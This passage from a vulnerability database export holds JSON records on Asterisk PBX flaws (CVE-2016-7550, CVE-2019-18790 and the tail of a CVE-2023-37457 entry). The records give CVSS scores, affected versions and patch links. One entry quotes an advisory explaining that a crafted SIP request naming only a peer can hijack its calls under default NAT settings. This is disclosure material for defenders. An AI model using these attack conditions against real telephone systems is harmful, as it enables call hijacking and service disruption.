            "url": "https://www.debian.org/security/faq"
          },
          {
            "trust": 0.1,
            "url": "https://security-tracker.debian.org/tracker/asterisk"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "date": "2024-01-05T14:31:02",
            "db": "PACKETSTORM",
            "id": "176383"
          },
          {
            "date": "2023-12-14T20:15:52.260000",
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2024-01-16T02:56:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          },
          {
            "date": "2023-12-29T00:15:49.697000",
            "db": "NVD",
            "id": "CVE-2023-37457"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Classic buffer overflow vulnerabilities in products from multiple vendors",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-020247"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-201905-0637

    Vulnerability from variot - Updated: 2023-12-18 13:02

    asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201905-0637",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 2.4,
            "vendor": "digium",
            "version": "13.10.0"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:13.10.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          }
        ]
      },
      "cve": "CVE-2016-7550",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 5.0,
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2016-7550",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-16531",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2016-7550",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2016-7550",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-16531",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201905-972",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-7550",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ]
      },
      "id": "VAR-201905-0637",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          }
        ],
        "trust": 0.06
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:02:13.874000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "AST-2016-006",
            "trust": 0.8,
            "url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
          },
          {
            "title": "Patch for DigiumAsterisk Denial of Service Vulnerability (CNVD-2019-16531)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/163053"
          },
          {
            "title": "Digium Asterisk Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92924"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-476",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7550"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7550"
          },
          {
            "trust": 0.6,
            "url": "https://web.nvd.nist.gov//vuln/detail/cve-2016-7550"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-7550"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "date": "2019-06-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "date": "2019-05-23T19:29:00.243000",
            "db": "NVD",
            "id": "CVE-2016-7550"
          },
          {
            "date": "2019-05-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-06-05T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-16531"
          },
          {
            "date": "2019-06-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          },
          {
            "date": "2019-05-24T17:12:45.697000",
            "db": "NVD",
            "id": "CVE-2016-7550"
          },
          {
            "date": "2019-05-27T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "asterisk In  NULL Pointer dereference vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-009339"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "code problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201905-972"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201911-0701

    Vulnerability from variot - Updated: 2023-12-18 12:27

    An issue was discovered in channels/chan_sip.c in Sangoma Asterisk 13.x before 13.29.2, 16.x before 16.6.2, and 17.x before 17.0.1, and Certified Asterisk 13.21 before cert5. A SIP request can be sent to Asterisk that can change a SIP peer's IP address. A REGISTER does not need to occur, and calls can be hijacked as a result. The only thing that needs to be known is the peer's name; authentication details such as passwords do not need to be known. This vulnerability is only exploitable when the nat option is set to the default, or auto_force_rport. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. An attacker could use this vulnerability to cause a denial of service.
    Nature of Advisory Denial of Service
    Susceptibility Remote Unauthenticated Sessions
    Severity Minor
    Exploits Known No
    Reported On October 17, 2019
    Reported By Andrey V. T.
    Modules Affected channels/chan_sip.c

    Resolution  Using any other option value for “nat” will prevent the       
                attack (such as “nat=no” or “nat=force_rport”), but will      
                need to be tested on an individual basis to ensure that it    
                works for the user’s deployment. On the fixed versions of     
                Asterisk, it will no longer set the address of the peer       
                before authentication is successful when a SIP request comes  
                in.
    
                               Affected Versions       
                         Product                       Release  
                                                       Series   
                  Asterisk Open Source                  13.x    All releases  
                  Asterisk Open Source                  16.x    All releases  
                  Asterisk Open Source                  17.x    All releases  
                   Certified Asterisk                   13.21   All releases
    
                                  Corrected In                   
                              Product                              Release    
                       Asterisk Open Source                        13.29.2    
                       Asterisk Open Source                        16.6.2     
                       Asterisk Open Source                        17.0.1     
                        Certified Asterisk                       13.21-cert5
    
                                     Patches                         
                               SVN URL                                Revision
    

    http://downloads.asterisk.org/pub/security/AST-2019-006-13.diff Asterisk 13 http://downloads.asterisk.org/pub/security/AST-2019-006-16.diff Asterisk 16 http://downloads.asterisk.org/pub/security/AST-2019-006-17.diff Asterisk 17 http://downloads.asterisk.org/pub/security/AST-2019-006-13.21.diff Certified
    Asterisk
    13.21-cert5

    Links  https://issues.asterisk.org/jira/browse/ASTERISK-28589
    
    Asterisk Project Security Advisories are posted at                        
    http://www.asterisk.org/security
    
    This document may be superseded by later versions; if so, the latest      
    version will be posted at                                                 
    http://downloads.digium.com/pub/security/AST-2019-006.pdf and             
    http://downloads.digium.com/pub/security/AST-2019-006.html
    
                                Revision History
          Date          Editor                 Revisions Made                 
    October 22, 2019   Ben Ford  Initial Revision                             
    November 14, 2019  Ben Ford  Corrected and updated fields for             
                                 versioning, and added CVE                    
    November 21, 2019  Ben Ford  Added “Posted On” date
    
               Asterisk Project Security Advisory - AST-2019-006
               Copyright © 2019 Digium, Inc. All Rights Reserved.
    

    Permission is hereby granted to distribute and publish this advisory in its original, unaltered form

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201911-0701",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.0.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "17.0.1"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.21.0"
          },
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "17.0.0"
          },
          {
            "model": "asterisk",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "digium",
            "version": "16.0.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "debian",
            "version": "9.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "16.6.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "debian",
            "version": "8.0"
          },
          {
            "model": "asterisk",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "digium",
            "version": "13.29.2"
          },
          {
            "model": "gnu/linux",
            "scope": null,
            "trust": 0.8,
            "vendor": "debian",
            "version": null
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "digium",
            "version": "13.x"
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "digium",
            "version": "16.x"
          },
          {
            "model": "asterisk",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "digium",
            "version": "17.x"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "digium",
            "version": "13.21"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=13.*"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=16.*"
          },
          {
            "model": "asterisk",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "\u003c=17.*"
          },
          {
            "model": "certified asterisk",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "sangoma",
            "version": "13.21"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-03059"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-012588"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert4:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert3:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert2:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:cert1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:rc1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "13.29.2",
                    "versionStartIncluding": "13.0.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "16.6.2",
                    "versionStartIncluding": "16.0.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "17.0.1",
                    "versionStartIncluding": "17.0.0",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:a:digium:certified_asterisk:13.21.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-18790"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "bford",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "155434"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1291"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2019-18790",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.8,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2019-18790",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
                "version": "2.0"
              },
              {
